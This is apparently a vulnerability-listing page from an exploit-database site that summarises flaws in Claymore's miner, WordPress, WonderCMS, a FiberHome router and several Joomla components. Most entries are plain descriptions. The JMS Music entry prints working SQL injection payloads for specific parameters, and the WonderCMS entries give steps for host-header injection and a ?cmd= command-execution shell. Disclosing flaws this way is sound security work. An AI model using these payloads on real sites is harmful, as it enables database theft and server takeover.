header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Claymore’s Dual GPU Miner 10.5 Format String Vulnerability

Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service. After realizing the buffer was printed, sending %s does return some strings, however I couldn’t get the hex addresses padded properly to dig in more as I kept getting unable to parse json errors. Sending %p also did yield some results but I’m sure someone more qualified may be able to exploit the stack further. Finally, sending %n completely kills the mining process.

WordPress load-scripts.php Remote Denial of Service Vulnerability

A vulnerability in WordPress allows an attacker to send a specially crafted request to the load-scripts.php file, which can cause a denial of service. The vulnerability is caused by the lack of proper validation of the 'load' parameter, which can be exploited to cause a denial of service. The vulnerability is present in WordPress versions prior to 5.5.3.

Wonder CMS 2.3.1 Host Header Injection

The application allows illegitimate host header manipulation and leads to aribtary web page re-direction. This can also lead to severe attacks such as password reset or web cache poisoning. To exploit, intercept any web request of cms using a proxy tool and change the http host header to: POST / HTTP/1.1 Host: google.com. You can observe the page being re-directed and the Location header changed in response to: http://www.google.com/

WonderCMS File Upload Vulnerability

A vulnerability in WonderCMS allows an authenticated user to upload a malicious file with a php extension containing malicious code. This code can be executed by adding ?cmd= to the URL followed by a system command such as whoami,time,date etc. This vulnerability can be exploited by an authenticated user with low privileges.

FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability

Vulnerability exists in web interface of FIBERHOME AN5506-04-F router. This router has vulnerabilities where you can get information or edit configurations in an unauthenticated way. The biggest risk is the possibility of changing the dns of the device. Modifying systems' DNS settings allows cybercriminals to perform malicious activities like steering unknowing users to bad sites, replacing ads on legitimate sites, controlling and redirecting network traffic, and pushing additional malware.

Joomla! Component JMS Music 1.1.1 – SQL Injection

The vulnerability allows an attacker to inject sql commands. Proof of Concept: 1) http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&keyword=[SQL] Parameter: keyword (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: option=com_jmsmusic&view=search&keyword=-5694' OR 3737=3737# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: option=com_jmsmusic&view=search&keyword=Efe' AND (SELECT 5924 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(5924=5924,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BeNf Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: option=com_jmsmusic&view=search&keyword=Efe' OR SLEEP(5)-- EoWI 2) http://localhost/[PATH]/index.php?option=com_jmsmusic&view=album&id=[SQL] Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: option=com_jmsmusic&view=album&id=-5694' OR 3737=3737# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: option=com_jmsmusic&view=album&id=Efe' AND (SELECT 5924 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(5924=5924,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BeNf Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: option=com_jmsmusic&view=album&id=Efe' OR SLEEP(5)-- EoWI

Joomla! Component JEXTN Classified 1.0.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands by sending a maliciously crafted HTTP request to the vulnerable application. An attacker can exploit this vulnerability to gain access to sensitive information stored in the application's database.

Joomla! Component JEXTN Reverse Auction 3.1.0 – SQL Injection

The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'id' of the 'index.php' file. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in application's database.

Recent Exploits: